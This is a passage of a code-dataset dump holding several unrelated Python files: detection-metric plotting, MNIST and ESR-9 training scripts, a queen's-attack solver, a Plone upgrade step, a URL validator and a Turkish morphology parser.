mag19_20,mag20_21,mag21_22,mag22_23,mag23_24,mag24_25,\\\n mag9_10_list,mag10_11_list,mag11_12_list,mag12_13_list,mag13_14_list,mag14_15_list,mag15_16_list,mag16_17_list,mag17_18_list,mag18_19_list,\\\n mag19_20_list,mag20_21_list,mag21_22_list,\\\n mag22_23_list,mag23_24_list,mag24_25_list\n\n\nprecision_all_sex = np.zeros((16))\nrecall_all_sex = np.zeros((16))\nprecision_all_det = np.zeros((16))\nrecall_all_det = np.zeros((16))\nf1_score_all_sex = np.zeros(16)\nf1_score_all_det = np.zeros(16)\nf2_score_all_sex = np.zeros(16)\nf2_score_all_det = np.zeros(16)\n\n\n\n\nfor threhold in thresholds:\n det_list = glob.glob(os.path.join(file_path, \"*det_\" + str(threhold) + \".txt\"))\n list_list = glob.glob(os.path.join(file_path, '*.list'))\n fits_list = glob.glob(os.path.join(file_path, \"*fits.txt\"))\n det_file_num = len(det_list)\n list_file_num = len(list_list)\n fits_file_num = len(fits_list)\n if (det_file_num == list_file_num) and (fits_file_num == list_file_num):\n for count,single in enumerate(det_list):\n name_index = single.split(\"/\")[-1].split(\"_det_\"+str(threhold))[0]\n fits_txt_name = os.path.join(file_path,name_index+'.fits.txt')\n list_name = os.path.join(file_path,name_index+'.list')\n det_img = np.loadtxt(single)\n sex_img = np.loadtxt(fits_txt_name)\n list_img = np.loadtxt(list_name)\n\n mag9_10, mag10_11, mag11_12, mag12_13, mag13_14, mag14_15, mag15_16, mag16_17, mag17_18, mag18_19, \\\n mag19_20, mag20_21, mag21_22, mag22_23, mag23_24, mag24_25, \\\n mag9_10_list, mag10_11_list, mag11_12_list, mag12_13_list, mag13_14_list, mag14_15_list, mag15_16_list, mag16_17_list, mag17_18_list, mag18_19_list, \\\n mag19_20_list, mag20_21_list, mag21_22_list, \\\n mag22_23_list, mag23_24_list, mag24_25_list = compute_section_target(list_img)\n\n\n mag_all = [mag9_10, mag10_11, mag11_12, mag12_13, mag13_14, mag14_15, mag15_16, mag16_17, mag17_18, mag18_19, \\\n mag19_20, mag20_21, mag21_22, mag22_23, mag23_24, mag24_25]\n mag_all_list = [mag9_10_list, mag10_11_list, mag11_12_list, mag12_13_list, mag13_14_list, mag14_15_list, mag15_16_list, mag16_17_list, mag17_18_list, mag18_19_list, \\\n mag19_20_list, mag20_21_list, mag21_22_list, \\\n mag22_23_list, mag23_24_list, mag24_25_list, mag24_25_list]\n\n\n precision_sex = []\n recall_sex = []\n precision_det = []\n recall_det = []\n f1_score_sex = []\n f1_score_det = []\n f2_score_sex = []\n f2_score_det = []\n\n mag_nums_all = sum(mag_all)\n\n for step, value in enumerate(mag_all):\n list_list_img_index = mag_all_list[step]\n prec_sex, rec_sex = sex_list_match(sex_img, list_list_img_index, value)\n if value != 0:\n prec_sex = prec_sex * (mag_nums_all/value)\n if 
prec_sex > 1:\n prec_sex = 1\n else:\n prec_sex = 1\n ### recompute the precision\n if prec_sex != 0 and rec_sex != 0:\n f1_score_s = 2*prec_sex*rec_sex/(prec_sex+rec_sex)\n f2_score_s = (1+2*2) * prec_sex * rec_sex / (2*2*prec_sex + rec_sex)\n else:\n f1_score_s = 0\n f2_score_s = 0\n f1_score_sex.append(f1_score_s)\n f2_score_sex.append(f2_score_s)\n precision_sex.append(prec_sex)\n recall_sex.append(rec_sex)\n prec_det, rec_det = det_list_match(det_img, list_list_img_index, value)\n if value != 0:\n prec_det = prec_det * (mag_nums_all/value)\n if prec_det > 1:\n prec_det = 1\n else:\n prec_det = 1\n precision_det.append(prec_det)\n recall_det.append(rec_det)\n if prec_det != 0 and rec_det != 0:\n f1_score_d = 2*prec_det*rec_det/(prec_det+rec_det)\n f2_score_d = (1 + 2 * 2) * prec_det * rec_det / (2 * 2 * prec_det + rec_det)\n else:\n f1_score_d = 0\n f2_score_d = 0\n f1_score_det.append(f1_score_d)\n f2_score_det.append(f2_score_d)\n precision_sex = np.array(precision_sex)\n recall_sex = np.array(recall_sex)\n precision_det = np.array(precision_det)\n recall_det = np.array(recall_det)\n f1_score_sex = np.array(f1_score_sex)\n f1_score_det = np.array(f1_score_det)\n f2_score_sex = np.array(f2_score_sex)\n f2_score_det = np.array(f2_score_det)\n\n precision_all_sex += precision_sex\n recall_all_sex += recall_sex\n precision_all_det += precision_det\n recall_all_det += recall_det\n f1_score_all_sex += f1_score_sex\n f1_score_all_det += f1_score_det\n f2_score_all_sex += f2_score_sex\n f2_score_all_det += f2_score_det\n\n precision_all_sex = precision_all_sex/(count+1)\n recall_all_sex = recall_all_sex/(count+1)\n precision_all_det = precision_all_det/(count+1)\n recall_all_det = recall_all_det/(count+1)\n f1_score_all_sex = f1_score_all_sex/(count+1)\n f1_score_all_det = f1_score_all_det/(count+1)\n f2_score_all_sex = f2_score_all_sex/(count+1)\n f2_score_all_det = f2_score_all_det/(count+1)\n\n\n x = np.arange(10.,26.,1)\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, recall_all_sex,linewidth = '2',color='yellow',label=\"recall_sex\")\n ax1.plot(x, recall_all_det,linewidth = '2', color='green', label=\"recall_det\")\n a = ax1.legend(loc=\"upper right\")\n x_major_locator=MultipleLocator(1)\n ax1.xaxis.set_major_locator(x_major_locator)\n Have_mag24_25 = False\n if Have_mag24_25:\n ax1.set_xlim([9.,25.])\n else:\n ax1.set_xlim([9., 24.])\n ax1.set_ylim([0.,1.1])\n ax1.set_xlabel('Magnitude', fontsize=16)\n ax1.set_ylabel('Recall',fontsize=16)\n ax1.set_title(\"Recall-mag-Precision\",fontsize=16)\n ax2 = ax1.twinx() # this is the important function\n ax2.plot(x, precision_all_sex, linewidth = '2',color='red',label=\"precision_sex\")\n ax2.plot(x, precision_all_det, linewidth = '2',color='black', label=\"precision_det\")\n b = ax2.legend(loc=\"lower left\")\n ax2.set_ylim([0,1.1])\n ax2.set_ylabel('Precision',fontsize=16)\n ax2.set_xlabel('Same X for both Recall and Precision',fontsize=16)\n plt.savefig('/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation/match_visualization/sex_det_{}.jpg'.format(threhold))\n plt.close()\n\n # f1-score\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, f1_score_all_sex, linewidth = '2',color='yellow', label=\"f1_score_sex\")\n ax1.plot(x, f1_score_all_det, linewidth = '2',color='green', label=\"f1_score_det\")\n ax1.plot(x, f2_score_all_sex, linewidth = '2',color='red', label=\"f2_score_sex\")\n ax1.plot(x, f2_score_all_det, linewidth = '2',color='black', label=\"f2_score_det\")\n a = 
ax1.legend(loc=\"lower left\")\n x_major_locator = MultipleLocator(1)\n ax1.xaxis.set_major_locator(x_major_locator)\n Have_mag24_25 = False\n if Have_mag24_25:\n ax1.set_xlim([9., 25.])\n else:\n ax1.set_xlim([9., 24.])\n ax1.set_ylim([0., 1.1])\n ax1.set_ylabel('f1/2_score',fontsize=16)\n ax1.set_title(\"f1/2-score-mag\",fontsize=16)\n ax1.set_xlabel('Magnitude', fontsize=16)\n plt.savefig('/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation/match_visualization/f1-score_{}.jpg'.format(threhold))\n plt.close()\nprint(\"completed!!!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"tools/match_visualization/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":13313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"106250912","text":"from neural_network import neuralNetwork\nimport numpy as np\n\n\n# number of input, hidden and output nodes\ninput_nodes = 784 # 28*28\nhidden_nodes = 500\noutput_nodes = 10\n\n# learning rate is 0.3\nlearning_rate = 0.1\n\n# create instance of neural network\nn = neuralNetwork(input_nodes, hidden_nodes, output_nodes, learning_rate)\n\ntraining_data_file = open(\"mnist_dataset/mnist_train_100.csv\", \"r\")\ntraining_data_list = training_data_file.readlines()\ntraining_data_file.close()\n\n# train the neural network\n\n# epochs is the number of times the training data set is used for training\nepochs = 5\n\nfor e in range(epochs):\n # go through all records in the training data set\n for record in training_data_list:\n # split the record by ',' commas\n all_values = record.split(',')\n # scale and shift the inputs\n inputs = (np.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01\n # create the target output values (all 0.01, expert the desired label which is 0.99)\n targets = np.zeros(output_nodes) + 0.01\n # all_values[0] is the target label for this record\n targets[int(all_values[0])] = 0.99\n n.train(inputs, targets)\n\nsave_wih_file = \"save_model/wih.npy\"\nnp.save(save_wih_file, n.wih)\nsave_who_file = \"save_model/who.npy\"\nnp.save(save_who_file, n.who)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"441440843","text":"# This Function is slower because we have used lists, lists are slower while finding any item then set\r\n\r\ndef slowQueensAttack(n, k, r_q, c_q, obstacles):\r\n moves=0\r\n \r\n if n==0:\r\n return 0\r\n\r\n directions=[(1,0),(-1,0),(0,1),(0,-1),(1,1),(-1,-1),(1,-1),(-1,1)]\r\n\r\n for i,j in directions:\r\n curr=[r_q+i,c_q+j]\r\n while 1<=curr[0]<=n and 1<=curr[1]<=n and [curr[0],curr[1]] not in obstacles:\r\n curr=[curr[0]+i,curr[1]+j]\r\n moves+=1\r\n\r\n\r\n return moves\r\n\r\ndef queensAttack(n, k, r_q, c_q, obstacles):\r\n moves=0\r\n \r\n if n==0:\r\n return 0\r\n\r\n ob=obstacles\r\n obstacles=set(tuple(i) for i in ob)\r\n\r\n directions={(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)}\r\n\r\n for i,j in directions:\r\n curr=(r_q+i,c_q+j)\r\n while 1<=curr[0]<=n and 1<=curr[1]<=n and (curr[0],curr[1]) not in obstacles:\r\n curr=(curr[0]+i,curr[1]+j)\r\n moves+=1\r\n\r\n\r\n return moves\r\n\r\nprint(queensAttack(5, 3, 4, 3, [[5, 5], [4, 2], [2, 3]]))\r\nprint(queensAttack(10000,0,4187,5068,[])) ","sub_path":"queensAttack.py","file_name":"queensAttack.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561108959","text":"from ftw.upgrade import UpgradeStep\nfrom opengever.core.upgrade import NightlyWorkflowSecurityUpdater\n\n\nclass UpdateLimitedAdminRole(UpgradeStep):\n \"\"\"Update limited admin role.\n \"\"\"\n\n def __call__(self):\n self.install_upgrade_profile()\n with NightlyWorkflowSecurityUpdater(reindex_security=False) as updater:\n updater.update(['opengever_dossier_workflow',\n 'opengever_repository_workflow',\n 'opengever_repositoryroot_workflow',\n 'opengever_templatefolder_workflow'])\n","sub_path":"opengever/core/upgrades/20220506101515_update_limited_admin_role/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"329522792","text":"from Utility.UtilityDataStructures import UtilityDataStructures\nutil = UtilityDataStructures()\nflag: bool = True\nwhile flag:\n\n try:\n list1 = []\n print(\"Enter the number of entries\")\n num_input = util.get_positive_integer()\n for counter in range(0, num_input):\n list1.append(input(\"Enter the string\"))\n # calling function to get the length of the longest string\n print(\"length of the longest string is \", util.longest_string(list1))\n except Exception as e:\n print(\"Process stopped because %s\" % e)\n print(\"To exit press 0 else press any other number\")\n if input() == 0:\n flag = False\n","sub_path":"Week2/StringQ5.py","file_name":"StringQ5.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"331374871","text":"import matplotlib.pyplot as plt\nfrom math_utilites import mp, mpf, linspace\nfrom constants import Borders\nfrom old_orthotropy.method import get_solution, Timer, find_dots\nfrom mpmath import MPContext\n\nM = 3\n#mp = MPContext()\nmp.prec = 1500\nh = 5\na = 10\n\n# Углеводородная пластина\nE_x = 220 * 10**9\nE_y = 6.9 * 10**9\nG_xy = 5 * 10**9\nnu_xy = 0.008\n\n# # Березовая фанера\n# E_x = 1.2 * 10**5\n# E_y = 0.6 * 10**5\n# G_xy = 0.07 * 10**5\n# nu_xy = 0.036\n\nfor name in ['E_x', 'E_y', 'G_xy', 'nu_xy', 'h', 'a']:\n globals()[name] = mpf(globals()[name])\n\nconditions = {\n Borders.UPPER: {\n 'sigma_x': lambda y: 1,\n 'tau': lambda *_: 0\n },\n Borders.BOTTOM: {\n 'sigma_x': lambda *_: 0,\n 'tau': lambda *_: 0\n },\n Borders.LEFT: {\n 'u': lambda *_: 0,\n 'v': lambda *_: 0\n },\n Borders.RIGHT: {\n 'u': lambda *_: 0,\n 'v': lambda *_: 0\n }\n}\n\n##########################################\nsolution = get_solution(M, h, a, E_x, E_y, G_xy, nu_xy, conditions, report=True)\n\nimport tkinter\n\nfrom gui.graphs import create_graph_frame\n\nin_dots = [y for x, y in find_dots(h, a, M)[Borders.UPPER]['sigma_x']]\ndots = [\n in_dots*2,\n (\n [conditions[Borders.BOTTOM]['sigma_x'](y) for y in in_dots]\n + [conditions[Borders.BOTTOM]['sigma_x'](y) for y in in_dots]\n )\n]\n\ncreate_graph_frame(\n tkinter.Tk(),\n func_name='sigma_x',\n var_name='y',\n func=solution[2],\n h=h,\n a=a\n).pack(expand=True, fill='both')\ntkinter.mainloop()\n\n'''\nsigma_x = get_solution(M, h, a, E_x, E_y, G_xy, nu_xy, conditions, report=True)[2]\n\ntimer = Timer()\nprint(\"Plotting graph...\")\ntimer.start()\n\ny_dots = linspace(0, a, 200)\n\nlist_of_vals = []\nfor x in [i*h/4 for i in range(5)]:\n list_of_vals.append(\n [sigma_x(x, y) for y in y_dots]\n )\n\nfor vals in list_of_vals:\n plt.plot(y_dots, vals)\n\ndots = find_dots(h, a, M)[Borders.UPPER]['sigma_x']\nplt.plot(\n [y for x, y in dots],\n [conditions[Borders.BOTTOM]['sigma_x'](y) for x, y in dots],\n '*'\n)\nplt.plot(\n [y for x, y in dots],\n [conditions[Borders.UPPER]['sigma_x'](y) for x, y in dots],\n '*'\n)\n\nprint(f'(done in {timer})')\nplt.show()\n'''","sub_path":"old_orthotropy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"193275685","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nets import nets_factory\n\nslim = tf.contrib.slim\n\n\nclass NetworksTest(tf.test.TestCase):\n\n def testGetNetworkFn(self):\n batch_size = 5\n num_classes = 1000\n for net in nets_factory.networks_map:\n with self.test_session():\n net_fn = nets_factory.get_network_fn(net, num_classes)\n # Most networks use 224 as their default_image_size\n image_size = getattr(net_fn, 'default_image_size', 224)\n inputs = tf.random_uniform(\n (batch_size, image_size, image_size, 3))\n logits, end_points = net_fn(inputs)\n self.assertTrue(isinstance(logits, tf.Tensor))\n self.assertTrue(isinstance(end_points, dict))\n self.assertEqual(logits.get_shape().as_list()[0], batch_size)\n self.assertEqual(logits.get_shape().as_list()[-1], num_classes)\n\n def testGetNetworkFnArgScope(self):\n batch_size = 5\n num_classes = 10\n net = 'cifarnet'\n with self.test_session(use_gpu=True):\n net_fn = nets_factory.get_network_fn(net, num_classes)\n image_size = getattr(net_fn, 'default_image_size', 224)\n with slim.arg_scope([slim.model_variable, slim.variable],\n device='/CPU:0'):\n inputs = tf.random_uniform(\n (batch_size, image_size, image_size, 3))\n net_fn(inputs)\n weights = tf.get_collection(\n tf.GraphKeys.GLOBAL_VARIABLES, 'CifarNet/conv1')[0]\n self.assertDeviceEqual('/CPU:0', weights.device)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"Dense_Motion_Estimation/3D Motion Estimation/slim/nets/nets_factory_test.py","file_name":"nets_factory_test.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"433429319","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/turkish_morphology/decompose.py\n# Compiled at: 2020-03-21 14:08:46\n# Size of source mod 2**32: 5797 bytes\n\"\"\"Functions to parse human-readable analyses into analysis protobuf messages.\n\"\"\"\nimport re\nfrom typing import Generator\nfrom turkish_morphology import analysis_pb2\n_Affix = analysis_pb2.Affix\n_Analysis = analysis_pb2.Analysis\n_AFFIX_REGEX = re.compile(\"[\\\\+-](?P(?:[^\\\\W\\\\d_]|['\\\\.])*?)\\\\[(?P[A-z]+?)=(?P[A-z0-9]+?)\\\\]\")\n_IG_REGEX = re.compile('\\\\((?:(?P.+?)\\\\[(?P[A-Z\\\\.,:\\\\(\\\\)\\\\\\'\\\\-\\\\\"`\\\\$]+?)\\\\]|\\\\[(?P[A-Z\\\\.,:\\\\(\\\\)\\\\\\'\\\\-\\\\\"`\\\\$]+?)\\\\](?P-(?:[^\\\\W\\\\d_]|\\')+?\\\\[[A-z]+?=[A-z]+?\\\\])?)(?P(?:\\\\+(?:[^\\\\W\\\\d_]|[\\'\\\\.])*?\\\\[[A-z]+?=[A-z0-9]+?\\\\])*)\\\\)(?:\\\\+\\\\[Proper=(?PTrue|False)\\\\])?')\n\nclass IllformedHumanReadableAnalysisError(Exception):\n __doc__ = 'Raised when a human-readable analysis is structurally ill-formed.'\n\n\ndef _make_affix(human_readable: str) -> Generator[(_Affix, None, None)]:\n \"\"\"Parses a sequence of human-readable affix analyses into affix protobuf.\n\n To illustrate, for the given human-readable analysis of below sequence of\n inflectional affixes;\n\n '+lAr[PersonNumber=A3pl]+Hm[Possessive=P1sg]'\n\n this function generates the corresponding affix protobufs;\n\n affix {\n feature {\n category: 'PersonNumber'\n value: 'A3pl'\n }\n meta_morpheme: 'lAr'\n }\n affix {\n feature {\n category: 'Possessive'\n value: 'P1sg'\n }\n meta_morpheme: 'Hm'\n }\n\n Args:\n human_readable: human-readable analysis for a sequence of derivational or\n inflectional morphemes (e.g. '-DHk[Derivation=PastNom]' or\n '+lAr[PersonNumber=A3pl]+Hm[Possessive=P1sg]+NDAn[Case=Abl]').\n\n Yields:\n Affix protobuf messages that are constructed from the human-readable affix\n analyses.\n \"\"\"\n matches = (m.groupdict() for m in _AFFIX_REGEX.finditer(human_readable))\n for matching in matches:\n affix = _Affix()\n affix.feature.category = matching['category']\n affix.feature.value = matching['value']\n if matching['meta_morpheme']:\n affix.meta_morpheme = matching['meta_morpheme']\n yield affix\n\n\ndef human_readable_analysis(human_readable: str) -> _Analysis:\n \"\"\"Parses given human-readable analysis into an analysis protobuf.\n\n To illustrate, for the given human-readable analysis;\n\n '(Ali[NNP]+lAr[PersonNumber=A3pl]+[Possessive=Pnon]\n +NHn[Case=Gen])+[Proper=True]'\n\n this function makes the corresponding analysis protobuf;\n\n inflectional_group {\n pos: 'NNP'\n root {\n morpheme: 'Ali'\n }\n inflection {\n feature {\n category: 'PersonNumber'\n value: 'A3pl'\n }\n meta_morpheme: 'lAr'\n }\n inflection {\n feature {\n category: 'Possessive'\n value: 'Pnon'\n }\n }\n inflection {\n feature {\n category: 'Case'\n value: 'Gen'\n }\n meta_morpheme: 'NHn'\n }\n proper: true\n }\n\n For the structure of the output analysis protobufs, see:\n\n //turkish_morphology/analysis.proto\n\n Args:\n human_readable: human-readable morphological analysis.\n\n Raises:\n IllformedHumanReadableAnalysisError: given human-readable morphological\n analysis is structurally ill-formed (e.g. 
missing part-of-speech tag,\n root form, derivational/inflectional morpheme, or feature category/value,\n etc.).\n\n Returns:\n Analysis protobuf message that is constructed from the human-readable\n analysis.\n \"\"\"\n if not human_readable:\n raise IllformedHumanReadableAnalysisError('Human-readable analysis is empty.')\n igs = tuple(_IG_REGEX.finditer(human_readable))\n matches = [ig.groupdict() for ig in igs]\n if not (igs and len(human_readable) == igs[(-1)].end() and matches[0]['root'] and matches[0]['root_pos'] and all((m['derivation'] for m in matches[1:])) and all((m['derivation_pos'] for m in matches[1:]))):\n raise IllformedHumanReadableAnalysisError(f\"Human-readable analysis is ill-formed: '{human_readable}'\")\n analysis = _Analysis()\n for position, matching in enumerate(matches):\n ig = analysis.ig.add()\n if position == 0:\n ig.pos = matching['root_pos']\n ig.root.morpheme = matching['root']\n else:\n ig.pos = matching['derivation_pos']\n derivation = tuple(_make_affix(matching['derivation']))[0]\n ig.derivation.CopyFrom(derivation)\n inflections = _make_affix(matching['inflections'])\n ig.inflection.extend(inflections)\n if matching['proper']:\n ig.proper = matching['proper'] == 'True'\n\n return analysis","sub_path":"pycfiles/turkish_morphology-1.2.1-py3.7/decompose.cpython-37.py","file_name":"decompose.cpython-37.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
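A short usage sketch for human_readable_analysis above, reusing the example string from its own docstring; the field accesses follow the protobuf structure the function builds (ig, pos, root.morpheme, proper).

from turkish_morphology import decompose

human_readable = ("(Ali[NNP]+lAr[PersonNumber=A3pl]+[Possessive=Pnon]"
                  "+NHn[Case=Gen])+[Proper=True]")
analysis = decompose.human_readable_analysis(human_readable)
print(analysis.ig[0].pos)            # 'NNP'
print(analysis.ig[0].root.morpheme)  # 'Ali'
print(analysis.ig[0].proper)         # True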
+{"seq_id":"231142691","text":"\"\"\"Helper functions for the application.\"\"\"\n\n\nimport re\n\n\ndef validate_url(url_string):\n \"\"\"Validate a url through regex.\"\"\"\n regex = re.compile(\n r'^(?:http|ftp)s?://'\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|'\n r'localhost|'\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})'\n r'(?::\\d+)?'\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n url_list = regex.findall(url_string)\n if url_list:\n return url_list[0]\n else:\n return None\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"8186776","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# External Libraries\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\nfrom PIL import Image\nimport numpy as np\nimport torch\n\n# Standard Libraries\nfrom os import path, makedirs\nimport copy\n\n# Modules\nfrom model.utils import udata, umath\nfrom model.ml.esr_9 import ESR\nfrom ensemble_network import Ensemble\n\n\ndef evaluate(val_model_eval, val_loader_eval, val_criterion_eval, device_to_process=\"cpu\", \n current_branch_on_training_val=0):\n \"\"\"\n Evaluate on the validation set. \n \"\"\"\n running_val_loss = [0.0 for _ in range(val_model_eval.get_ensemble_size())]\n running_val_corrects = [0 for _ in range(val_model_eval.get_ensemble_size() + 1)]\n running_val_steps = [0 for _ in range(val_model_eval.get_ensemble_size())]\n\n labels_all, preds_all = [], []\n for inputs_eval, labels_eval in val_loader_eval:\n inputs_eval, labels_eval = inputs_eval.to(device_to_process), labels_eval.to(device_to_process)\n outputs_eval = val_model_eval(inputs_eval)\n outputs_eval = outputs_eval[:val_model_eval.get_ensemble_size() - current_branch_on_training_val]\n\n # Ensemble prediction\n overall_preds = torch.zeros(outputs_eval[0].size()).to(device_to_process)\n for o_eval, outputs_per_branch_eval in enumerate(outputs_eval, 0):\n _, preds_eval = torch.max(outputs_per_branch_eval, 1)\n\n running_val_corrects[o_eval] += torch.sum(preds_eval == labels_eval).cpu().numpy()\n loss_eval = val_criterion_eval(outputs_per_branch_eval, labels_eval)\n running_val_loss[o_eval] += loss_eval.item()\n running_val_steps[o_eval] += 1\n\n for v_i, v_p in enumerate(preds_eval, 0):\n overall_preds[v_i, v_p] += 1\n\n # Compute accuracy of ensemble predictions\n _, preds_eval = torch.max(overall_preds, 1)\n running_val_corrects[-1] += torch.sum(preds_eval == labels_eval).cpu().numpy()\n labels_all.extend(labels_eval)\n preds_all.extend(preds_eval)\n\n for b_eval in range(val_model_eval.get_ensemble_size()):\n div = running_val_steps[b_eval] if running_val_steps[b_eval] != 0 else 1\n running_val_loss[b_eval] /= div\n\n return running_val_loss, running_val_corrects, labels_all, preds_all\n\n\ndef main():\n base_path_experiment = \"./experiments/self_data/\"\n name_experiment = \"ESR_9-sample\"\n base_path_to_dataset = \"./self_data/\"\n num_branches_trained_network = 9\n validation_interval = 2\n max_training_epoch = 2\n current_branch_on_training = 8\n\n # Make dir\n if not path.isdir(path.join(base_path_experiment, name_experiment)):\n makedirs(path.join(base_path_experiment, name_experiment))\n\n # Define transforms\n data_transforms = [transforms.ColorJitter(brightness=0.5, contrast=0.5),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomAffine(degrees=30,\n translate=(.1, .1),\n scale=(1.0, 1.25),\n resample=Image.BILINEAR)]\n\n # Running device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n print(\"Starting: {}\".format(str(name_experiment)))\n print(\"Running on {}\".format(device))\n\n # Load network trained on AffectNet - \n # load_path can indicate the path where the network needs to be loaded from.\n load_path = None\n net = Ensemble.load(device, num_branches_trained_network, load_path)\n\n # Send params to device\n net.to_device(device)\n\n # Set optimizer\n optimizer = optim.SGD([{\"params\": net.base.parameters(), \"lr\": 0.1, \"momentum\": 0.9},\n {\"params\": 
net.branches[0].parameters(), \"lr\": 0.1, \"momentum\": 0.9}])\n for b in range(1, net.get_ensemble_size()):\n optimizer.add_param_group({\"params\": net.branches[b].parameters(), \"lr\": 0.02, \"momentum\": 0.9})\n\n # Define criterion\n criterion = nn.CrossEntropyLoss()\n\n # Load validation set\n # max_loaded_images_per_label=100000 loads the whole validation set\n val_data = udata.Sample(idx_set=1,\n max_loaded_images_per_label=1000,\n transforms=None,\n base_path_to_sample=base_path_to_dataset)\n val_loader = DataLoader(val_data, batch_size=16, shuffle=False, num_workers=8)\n\n # Fine-tune ESR-9\n for branch_on_training in range(num_branches_trained_network):\n # Load training data\n train_data = udata.Sample(idx_set=0,\n max_loaded_images_per_label=5000,\n transforms=transforms.Compose(data_transforms),\n base_path_to_sample=base_path_to_dataset)\n train_batch_size = 16\n\n # Best network\n best_ensemble = net.to_state_dict()\n best_ensemble_acc = 0.0\n\n # Initialize scheduler\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.75, last_epoch=-1)\n\n # History\n history_loss = []\n history_acc = [[] for _ in range(net.get_ensemble_size())]\n history_val_loss = [[] for _ in range(net.get_ensemble_size())]\n history_val_acc = [[] for _ in range(net.get_ensemble_size() + 1)]\n\n # Training branch\n for epoch in range(max_training_epoch):\n train_loader = DataLoader(train_data, batch_size=train_batch_size, shuffle=True, num_workers=8)\n\n running_loss = 0.0\n running_corrects = [0.0 for _ in range(net.get_ensemble_size())]\n running_updates = 0\n\n idx = 1\n\n for inputs, labels in train_loader:\n # Get the inputs\n # print(inputs, labels)\n inputs, labels = inputs.to(device), labels.to(device)\n\n # Set gradients to zero\n optimizer.zero_grad()\n\n # Forward\n outputs = net(inputs)\n confs_preds = [torch.max(o, 1) for o in outputs]\n\n # Compute loss\n loss = 0.0\n for i_4 in range(net.get_ensemble_size() - current_branch_on_training):\n preds = confs_preds[i_4][1]\n running_corrects[i_4] += torch.sum(preds == labels).cpu().numpy()\n loss += criterion(outputs[i_4], labels)\n\n # Backward\n loss.backward()\n\n # Optimize\n optimizer.step()\n\n # Save loss\n running_loss += loss.item()\n running_updates += 1\n print(\"Number: {:d}, Loss: {:.4f}\".format(train_batch_size * idx, loss.item()))\n idx += 1\n\n scheduler.step()\n # Statistics\n print(\"[Branch {:d}, Epochs {:d}--{:d}] \"\n \"Loss: {:.4f} Acc: {}\".format(net.get_ensemble_size() - current_branch_on_training,\n epoch + 1,\n max_training_epoch,\n running_loss / running_updates,\n np.array(running_corrects) / len(train_data)))\n # Validation\n if ((epoch % validation_interval) == 0) or ((epoch + 1) == max_training_epoch):\n net.eval()\n\n val_loss, val_corrects, _, _ = evaluate(net, val_loader, criterion, device, current_branch_on_training)\n\n print(\"\\nValidation - [Branch {:d}, Epochs {:d}--{:d}] Loss: {:.4f} Acc: {}\\n\\n\".format(\n net.get_ensemble_size() - current_branch_on_training,\n epoch + 1,\n max_training_epoch,\n val_loss[-1],\n np.array(val_corrects) / len(val_data)))\n\n # Add to history training and validation statistics\n history_loss.append(running_loss / running_updates)\n\n for i_4 in range(net.get_ensemble_size()):\n history_acc[i_4].append(running_corrects[i_4] / len(train_data))\n\n for b in range(net.get_ensemble_size()):\n history_val_loss[b].append(val_loss[b])\n history_val_acc[b].append(float(val_corrects[b]) / len(val_data))\n\n # Add ensemble accuracy to history\n 
